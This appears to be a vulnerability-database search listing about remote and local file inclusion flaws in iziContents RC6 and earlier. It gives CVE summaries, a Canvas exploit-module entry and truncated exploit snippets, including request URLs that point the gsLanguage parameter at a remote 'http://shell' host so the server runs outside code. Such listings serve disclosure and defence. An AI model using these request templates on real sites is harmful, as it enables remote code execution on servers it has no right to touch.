24 matches found
EUVD-2007-5036
Malware in sbrugna...
EUVD-2007-5034
Malware in sbrugna...
iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? / vulnerable code = include/rssfunctions.php line 32-40: .... $GLOBALSrootdp = './'; requireonce $GLOBALSrootdp.include/config.php; requireonce $GLOBALSrootdp.include/db.php; requireonce $GLOBALSrootdp.include/session.php;...
izicontents <= rc6 (rfi/lfi) Multiple Vulnerabilities
No description provided by source. o bug /. . . . .-' -...-'/ o o , . o -...--.\ vuln.: iziContents = RC6 RFI/LFI Multiple Remote Vulnerabilities author: [email protected] download: http://www.izicontents.com/download/iziContents1RC6.zip greetz: cOndemned, kacper ; remote file inclusion:...
izicontents-rfilfi.txt
o bug /". . . . .-' -...-'/ o o remote file inclusion: http://site/path/modules/search/search.php?languagehome=&rootdp=zZz&gsLanguage=http://shell? http://site/path/modules/poll/inlinepoll.php?languagehome=&rootdp=zZz&gsLanguage=http://shell?...
Directory traversal
Multiple directory traversal vulnerabilities in iziContents 1 RC6 and earlier allow remote attackers to include and execute arbitrary local files via a .. dot dot in 1 the adminhome parameter to modules/poll/pollsummary.php or 2 the rootdp parameter to include/db.php...
Immunity Canvas: IZICONTENTS_INCLUDE
Name| izicontentsinclude ---|--- CVE| CVE-2007-5054 Exploit Pack| CANVAS Description| iziContents Remote file inclusion Notes| CVSS: 7.5 Repeatability: Infinite VENDOR: iziContents CVE Url: https://vulners.com/cve/CVE-2007-5054 CVE Name: CVE-2007-5054...
CVE-2007-5055
Multiple directory traversal vulnerabilities in iziContents 1 RC6 and earlier allow remote attackers to include and execute arbitrary local files via a .. dot dot in 1 the adminhome parameter to modules/poll/pollsummary.php or 2 the rootdp parameter to include/db.php...
Design/Logic Flaw
Multiple incomplete blacklist vulnerabilities in iziContents 1 RC6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in 1 the adminhome parameter to modules/poll/pollsummary.php or 2 the rootdp parameter to include/db.php; or a URL in the languagehome parameter to 3...
CVE-2007-5053
Multiple incomplete blacklist vulnerabilities in iziContents 1 RC6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in 1 the adminhome parameter to modules/poll/pollsummary.php or 2 the rootdp parameter to include/db.php; or a URL in the languagehome parameter to 3...
CVE-2007-5054
Multiple PHP remote file inclusion vulnerabilities in iziContents 1 RC6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the gsLanguage parameter to 1 search/search.php, 2 poll/inlinepoll.php, 3 poll/showpoll.php, 4 links/showlinks.php, or 5 links/submitlinks.php in...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in iziContents 1 RC6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the gsLanguage parameter to 1 search/search.php, 2 poll/inlinepoll.php, 3 poll/showpoll.php, 4 links/showlinks.php, or 5 links/submitlinks.php in...
CVE-2007-5053
Multiple incomplete blacklist vulnerabilities in iziContents 1 RC6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in 1 the adminhome parameter to modules/poll/pollsummary.php or 2 the rootdp parameter to include/db.php; or a URL in the languagehome parameter to 3...
CVE-2007-5054
Multiple PHP remote file inclusion vulnerabilities in iziContents 1 RC6 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the gsLanguage parameter to 1 search/search.php, 2 poll/inlinepoll.php, 3 poll/showpoll.php, 4 links/showlinks.php, or 5 links/submitlinks.php in...
CVE-2007-5054
The CVE-2007-5054 issue affects iziContents 1 RC6 and earlier, where remote attackers can trigger PHP remote file inclusion through the gsLanguage parameter in several module scripts (search/search.php, poll/inlinepoll.php, poll/showpoll.php, links/showlinks.php, links/submit_links.php). The unde...
CVE-2007-5055
CVE-2007-5055 affects iziContents 1 RC6 and earlier. The vulnerability is a directory traversal that allows remote attackers to include and execute arbitrary local files via a .. in the admin_home parameter to modules/poll/poll_summary.php or the rootdp parameter to include/db.php. Connected reco...
CVE-2007-5053
CVE-2007-5053 affects iziContents 1 RC6 and earlier. The vulnerability consists of multiple incomplete blacklist flaws that allow remote attackers to execute arbitrary PHP code via crafted URLs in various parameters across modules (e.g., admin_home in modules/poll/poll_summary.php; rootdp in incl...
CVE-2007-5055
Multiple directory traversal vulnerabilities in iziContents 1 RC6 and earlier allow remote attackers to include and execute arbitrary local files via a .. dot dot in 1 the adminhome parameter to modules/poll/pollsummary.php or 2 the rootdp parameter to include/db.php...
iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities
No description provided by source. o bug /". . . . .-' -...-'/ o o , . o -...--".\ vuln.: iziContents = RC6 RFI/LFI Multiple Remote Vulnerabilities author: [email protected] download: http://www.izicontents.com/download/iziContents1RC6.zip greetz: cOndemned, kacper ; remote file inclusion:...
iziContents rc6 - LocalRemote File Inclusion
iziContents rc6 - LocalRemote File Inclusion o bug /". . . . .-' -...-'/ o o remote file inclusion: http://site/path/modules/search/search.php?languagehome=&rootdp=zZz&gsLanguage=http://shell? http://site/path/modules/poll/inlinepoll.php?languagehome=&rootdp=zZz&gsLanguage=http://shell?...